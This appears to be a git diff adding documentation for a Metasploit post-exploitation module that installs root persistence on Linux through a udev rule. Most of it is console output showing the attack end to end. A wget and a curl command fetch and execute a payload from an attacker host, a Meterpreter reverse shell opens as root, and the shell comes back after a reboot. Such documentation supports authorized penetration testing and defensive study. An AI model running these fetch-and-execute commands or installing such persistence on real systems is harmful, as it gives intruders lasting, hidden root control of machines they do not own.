|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This is a post module that performs a persistence installation on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev). |
| 4 | +The persistence execution with be triggered with root privileges everytime a network interface other than `l0` comes up. |
| 5 | +Execution is triggered through at command, so it must be installed on the target. |
| 6 | + |
| 7 | +## Verification Steps |
| 8 | + |
| 9 | +1. Start msfconsole |
| 10 | +2. Obtain a root session on the target machine |
| 11 | +3. `use exploit/linux/persistence/udev` |
| 12 | +4. `set session -1` |
| 13 | +5. `exploit` |
| 14 | + |
| 15 | +## Options |
| 16 | + |
| 17 | +### PAYLOAD_NAME |
| 18 | + |
| 19 | +Name of the payload file to write. Defaults to random. |
| 20 | + |
| 21 | +### UDEV_PATH |
| 22 | + |
| 23 | +Path to udev rules folder. Defaults to `/lib/udev/rules.d/` |
| 24 | + |
| 25 | +### UDEV_RULE |
| 26 | + |
| 27 | +Rule name for udev. Defaults to random |
| 28 | + |
| 29 | +## Scenarios |
| 30 | + |
| 31 | +## Module usage |
| 32 | + |
| 33 | +### Ubuntu 24.04 |
| 34 | + |
| 35 | +Initial shell |
| 36 | + |
| 37 | +``` |
| 38 | +resource (/root/.msf4/msfconsole.rc)> setg verbose true |
| 39 | +verbose => true |
| 40 | +resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2 |
| 41 | +lhost => 2.2.2.2 |
| 42 | +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp |
| 43 | +payload => cmd/linux/http/x64/meterpreter/reverse_tcp |
| 44 | +resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery |
| 45 | +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp |
| 46 | +resource (/root/.msf4/msfconsole.rc)> set target 7 |
| 47 | +target => 7 |
| 48 | +resource (/root/.msf4/msfconsole.rc)> set srvport 8082 |
| 49 | +srvport => 8082 |
| 50 | +resource (/root/.msf4/msfconsole.rc)> set uripath l |
| 51 | +uripath => l |
| 52 | +resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp |
| 53 | +payload => linux/x64/meterpreter/reverse_tcp |
| 54 | +resource (/root/.msf4/msfconsole.rc)> set lport 4446 |
| 55 | +lport => 4446 |
| 56 | +resource (/root/.msf4/msfconsole.rc)> run |
| 57 | +[*] Exploit running as background job 0. |
| 58 | +[*] Exploit completed, but no session was created. |
| 59 | +[*] Started reverse TCP handler on 2.2.2.2:4446 |
| 60 | +[*] Using URL: http://2.2.2.2:8082/l |
| 61 | +[*] Server started. |
| 62 | +[*] Run the following command on the target machine: |
| 63 | +wget -qO Qjdo0XSK --no-check-certificate http://2.2.2.2:8082/l; chmod +x Qjdo0XSK; ./Qjdo0XSK& disown |
| 64 | +msf exploit(multi/script/web_delivery) > |
| 65 | +[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes) |
| 66 | +[*] Transmitting intermediate stager...(126 bytes) |
| 67 | +[*] Sending stage (3090404 bytes) to 1.1.1.1 |
| 68 | +[*] Meterpreter session 1 opened (2.2.2.2:4446 -> 1.1.1.1:43842) at 2025-12-20 16:24:02 -0500 |
| 69 | +
|
| 70 | +msf exploit(multi/script/web_delivery) > sessions -i 1 |
| 71 | +[*] Starting interaction with 1... |
| 72 | +
|
| 73 | +meterpreter > getuid |
| 74 | +Server username: root |
| 75 | +meterpreter > sysinfo |
| 76 | +Computer : 1.1.1.1 |
| 77 | +OS : Ubuntu 24.04 (Linux 6.8.0-31-generic) |
| 78 | +Architecture : x64 |
| 79 | +BuildTuple : x86_64-linux-musl |
| 80 | +Meterpreter : x64/linux |
| 81 | +meterpreter > background |
| 82 | +[*] Backgrounding session 1... |
| 83 | +``` |
| 84 | + |
| 85 | +Persistence install |
| 86 | + |
| 87 | +``` |
| 88 | +msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/udev |
| 89 | +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp |
| 90 | +msf exploit(linux/persistence/udev) > set session 1 |
| 91 | +session => 1 |
| 92 | +msf exploit(linux/persistence/udev) > set WritableDir /opt/ |
| 93 | +WritableDir => /opt/ |
| 94 | +msf exploit(linux/persistence/udev) > exploit |
| 95 | +[*] Command to run on remote host: curl -so ./eULGakHgwKeL http://2.2.2.2:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eULGakHgwKeL;./eULGakHgwKeL& |
| 96 | +[*] Exploit running as background job 1. |
| 97 | +[*] Exploit completed, but no session was created. |
| 98 | +
|
| 99 | +[*] Fetch handler listening on 2.2.2.2:8080 |
| 100 | +[*] HTTP server started |
| 101 | +[*] Adding resource /t70WmtC4mNeBieRpZqn09Q |
| 102 | +[*] Started reverse TCP handler on 2.2.2.2:4444 |
| 103 | +msf exploit(linux/persistence/udev) > [*] Running automatic check ("set AutoCheck false" to disable) |
| 104 | +[+] The target appears to be vulnerable. likely exploitable |
| 105 | +[*] Writing '/opt//Z7CpOCzhzq' (271 bytes) ... |
| 106 | +[+] /opt//Z7CpOCzhzq written |
| 107 | +[+] /lib/udev/rules.d//41-EInB5urA.rules written |
| 108 | +[*] Triggering udev rule |
| 109 | +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/1.1.1.1_20251220.5601/1.1.1.1_20251220.5601.rc |
| 110 | +[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q |
| 111 | +[*] Sending payload to 1.1.1.1 (curl/8.5.0) |
| 112 | +[*] Transmitting intermediate stager...(126 bytes) |
| 113 | +[*] Sending stage (3090404 bytes) to 1.1.1.1 |
| 114 | +[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38100) at 2025-12-20 16:56:03 -0500 |
| 115 | +``` |
| 116 | + |
| 117 | +Trigger a reboot to test the persistence |
| 118 | + |
| 119 | +``` |
| 120 | +msf exploit(linux/persistence/udev) > sessions -i 1 |
| 121 | +[*] Starting interaction with 1... |
| 122 | +
|
| 123 | +meterpreter > shell |
| 124 | +Process 1394 created. |
| 125 | +Channel 8 created. |
| 126 | +reboot |
| 127 | +
|
| 128 | +[*] 1.1.1.1 - Meterpreter session 1 closed. Reason: Died |
| 129 | +
|
| 130 | +
|
| 131 | +Terminate channel 8? [y/N] y |
| 132 | +[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value> |
| 133 | +msf exploit(linux/persistence/udev) > |
| 134 | +[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q |
| 135 | +[*] Sending payload to 1.1.1.1 (curl/8.5.0) |
| 136 | +[*] Transmitting intermediate stager...(126 bytes) |
| 137 | +[*] Sending stage (3090404 bytes) to 1.1.1.1 |
| 138 | +[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:35550) at 2025-12-20 16:56:38 -0500 |
| 139 | +[*] 1.1.1.1 - Meterpreter session 2 closed. Reason: Died |
| 140 | +
|
| 141 | +msf exploit(linux/persistence/udev) > sessions -i 3 |
| 142 | +[*] Starting interaction with 3... |
| 143 | +
|
| 144 | +meterpreter > getuid |
| 145 | +Server username: root |
| 146 | +meterpreter > |
| 147 | +``` |
0 commit comments